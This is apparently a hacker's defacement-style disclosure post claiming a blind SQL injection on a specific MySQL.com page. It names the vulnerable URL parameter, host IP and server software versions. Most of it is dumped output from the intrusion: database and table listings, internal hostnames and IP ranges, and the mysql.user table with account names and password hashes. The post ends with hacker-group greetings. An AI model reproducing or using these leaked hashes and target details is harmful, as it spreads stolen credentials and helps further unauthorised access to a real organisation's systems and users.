--------------------------------------------------------------------------------------- [+] MySQL.com Vulnerable To Blind SQL Injection vulnerability [+] Author: Jackh4xor @ w4ck1ng [+] Site: http://www.jackh4xor.com --------------------------------------------------------------------------------------- About MySQL.com : -------------------------------------------------------------------------------------------------------------------- The Mysql website offers database software, services and support for your business, including the Enterprise server, the Network monitoring and advisory services and the production support. The wide range of products include: Mysql clusters, embedded database, drivers for JDBC, ODBC and Net, visual database tools (query browser, migration toolkit) and last but not least the MaxDB- the open source database certified for SAP/R3. The Mysql services are also made available for you. Choose among the Mysql training for database solutions, Mysql certification for the Developers and DBAs, Mysql consulting and support. It makes no difference if you are new in the database technology or a skilled developer of DBA, Mysql proposes services of all sorts for their customers. -------------------------------------------------------------------------------------------------------------------- Vulnerable Target : http://mysql.com/customers/view/index.html?id=1170 Host IP : 213.136.52.29 Web Server : Apache/2.2.15 (Fedora) Powered-by : PHP/5.2.13 Injection Type : MySQL Blind Current DB : web lead_routing_rule lead_rep lead_old lead_note lead_extra_old lead_extra_new lead_extra lead_companies lead_campaign_member lead language_strings language_modules imagecache hall_of_fame g_search_term g_search_data g_blog_data forum_comment forms field_xref field_options field_match email_blacklist email_a_friend drpl_manual_review drpl_denied drpl_check_log drpl_cache customer_meta_sets customer_meta_set customer_meta customer coupon_product coupon_campaign_attribute coupon_campaign coupon country countries campaign_type campaign_topic campaign_score campaign_listdata campaign_detail business bounces Database : mysql Table: user_info user Column: Update_pri Insert_priv Select_priv Password User Host time_zone_transition_type time_zone_transition time_zone_name time_zone_leap_second time_zone tables_priv slow_log ?ervers procs_priv proc plugin ndb_binlog_index inventory host help_topic help_relation help_keyword help_category general_log func event db columns_priv # mysql.user Data Password User Host wembaster % monitor 10.% sys % sys localhost *06581D0A5474DFF4D5DA3CE0CD7702FA52601412 forumread % *0702AEBF8E92A002E95D40247776E1A67CD2CA3F wb % *2A57F767D29295B3CB8D01C760D9939649483F85 flipper 10.% *32F623705BFFFE682E7BD18D5357B38EF8A5BAA9 wordpress % *66A905D4110DF14B41D585FDBCE0666AD13DD8C1 nagios % *704EB56151317F27573BB4DDA98EDF00FFABAAF8 root localhost *ED1BDC19B08FD41017EE180169E5CEB2C77F941A mysqlforge % *FD75B177FFEC3590FE5D7E8459B3DDC60AE8147B webleads 10.% 00680dd718880337 olof % 077f61a849269b62 qa_r % 077f61a849269b62 qa_rw % 077f61a849269b62 qa_adm % 0c2f46ba6b87d4ea trials_admin 10.% 1856b9b03b5a6f47 cacti % 19519e95545509b5 certification % 1a39dcad63bbc7a6 gf_mschiff % 2277fd7d562ec459 webslave localhost 2277fd7d562ec459 webslave % 304404b114b5516c planetmysql_rw % 35e376451a87adb0 planetmysql_ro % 4e203d581b756a93 webmaster localhost 4e203d581b756a93 webmaster % 4e93479179a8ec93 sysadm % 575ec47e16c7e20e phorum5 % 575ec47e16c7e20e lenz % 5f340ec40a706f64 robin % 61113da02d2c97a5 regdata % 616075f256f111ba myadmin 10.100.6.44 61711eea3de509ac merlin 127.0.0.1 6302de0909a369a1 ebraswell % 6b72b2824cc7f6fe mysqlweb % 6ffd2b17498cdd44 zack % 70599cf351c6f591 repl % 740284817e3ed5a8 webwiki % 74c5529b41a97cc2 web_projects Databsae: web_control Table: system system_command service_request run_control request_daemon rebuild_server rebuild_queue rebuild_control quarterly_lead_report newsletter_log newsletter_control ips hosts Columns:notes description name dns_servers Columns: name internal ip Database: certification Tables: signup corpcustomers certexamdata certcandidatedata certaccess Database: wordpress Tables: wp_4_term_taxonom wp_4_term_relationships wp_4_posts wp_4_postmeta wp_4_options wp_4_links wp_4_comments wp_3_terms wp_3_term_taxonomy wp_3_term_relationships wp_3_posts wp_3_postmeta wp_3_options wp_3_links wp_3_comments wp_2_terms wp_2_term_taxonomy wp_2_term_relationships wp_2_posts wp_2_postmeta wp_2_options wp_2_links wp_2_comments wp_1_terms wp_1_term_taxonomy wp_1_term_relationships wp_1_posts wp_1_postmeta wp_1_options wp_1_links wp_1_comments wp_11_terms wp_11_term_taxonomy wp_11_term_relationships wp_11_posts wp_11_postmeta wp_11_options wp_11_links wp_11_comments wp_10_terms wp_10_term_taxonomy wp_10_term_relationships wp_10_posts wp_10_postmeta wp_10_options wp_10_links wp_10_comments remove_queries Database: bk Table: wp_backupterm_taxonomy wp_backupterm_relationships wp_backupposts wp_backuppostmeta wp_backupoptions wp_backuplinks wp_backupcomments ----------------------------------------------------------------------------------- Signed : Jackh4xor ! Greetz : rooto, Mr.52, zone-hacker, w4ck1ng (In)Security -------------------------------------------------------------------------------------